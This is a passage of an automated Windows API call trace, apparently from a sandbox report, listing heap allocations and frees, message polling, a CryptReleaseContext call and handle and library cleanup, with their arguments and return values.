0x1 [0189.306] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0189.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0189.306] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0189.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0189.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0189.306] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0189.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0189.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0189.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0189.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0189.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0189.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0189.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0189.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0189.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0189.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0189.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0189.306] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0189.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0189.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0189.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0189.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0189.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0189.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0189.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0189.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0189.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0189.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0189.307] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0189.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0189.307] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0189.307] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0189.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0189.307] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0189.307] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0189.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0189.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0189.307] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0189.307] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0189.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0189.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0189.307] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.308] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0189.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0189.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0189.308] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0189.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0189.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0189.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0189.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0189.308] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.308] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0189.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0189.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0189.308] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0189.308] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0189.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0189.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0189.308] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0189.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0189.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0189.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0189.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0189.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0189.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69ac8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0189.309] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0189.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0189.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0189.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0189.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0189.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0189.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0189.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0189.310] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0189.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0189.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0189.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0189.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0189.310] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.310] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0189.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0189.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0189.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0189.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0189.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0189.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0189.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0189.311] FreeLibrary (hLibModule=0x756e0000) returned 1 [0189.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0189.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0189.311] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0189.311] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0189.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0189.311] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0189.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0189.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0189.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0189.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0189.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0189.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0189.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0189.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0189.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0189.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0189.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0189.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0189.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0189.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0189.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0189.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0189.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0189.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0189.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0189.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0189.312] CloseHandle (hObject=0x2d0) returned 1 [0189.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0189.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0189.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0189.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0189.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0189.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0189.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0189.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0189.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0189.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0189.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0189.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0189.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0189.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0189.316] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0189.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0189.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0189.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0189.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0189.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0189.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0189.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0189.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0189.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0189.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0189.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0189.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0189.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0189.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0189.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0189.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0189.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0189.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0189.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0189.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0189.317] CloseHandle (hObject=0x2a0) returned 1 [0189.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0189.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0189.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0189.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0189.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0189.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0189.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0189.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0189.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0189.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0189.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0189.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0189.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0189.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0189.323] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0189.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0189.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0189.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0189.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0189.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0189.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0189.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0189.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0189.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0189.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0189.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0189.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0189.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0189.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0189.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0189.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0189.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c375c8 | out: hHeap=0x970000) returned 1 [0189.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0189.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0189.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0189.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0189.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0189.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0189.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0189.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0189.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0189.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0189.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0189.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0189.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0189.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0189.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0189.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0189.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0189.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0189.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0189.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0189.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0189.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0189.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0189.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0189.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0189.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0189.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0189.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0189.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0189.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0189.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0189.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0189.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0189.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0189.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0189.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0189.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0189.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 